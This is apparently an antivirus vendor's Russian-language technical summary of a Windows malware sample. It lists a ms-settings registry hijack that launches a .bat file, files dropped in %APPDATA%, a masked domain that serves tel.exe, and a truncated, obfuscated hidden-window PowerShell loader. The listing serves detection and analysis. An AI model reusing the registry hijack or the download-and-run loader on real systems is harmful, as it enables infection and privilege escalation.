Техническая информация
- [<HKCU>\Software\Classes\ms-settings\Shell\Open\command] '' = '%APPDATA%\IBcWC.bat'
- %APPDATA%\tel.exe
- %APPDATA%\ibcwc.bat
- 'so####ginshops.com':80
- http://so####ginshops.com/tel.exe
- DNS ASK so####ginshops.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function MJiXixeX($UiztLHcHjKY, $vzdnBLc){[IO.File]::WriteAllBytes($UiztLHcHjKY, $vzdnBLc)};function rDGefbRHzAICyiPC($GQCagFsIzXgaguNKNHf){$fyxWOjvvgZBEubggBrWb =...' (со скрытым окном)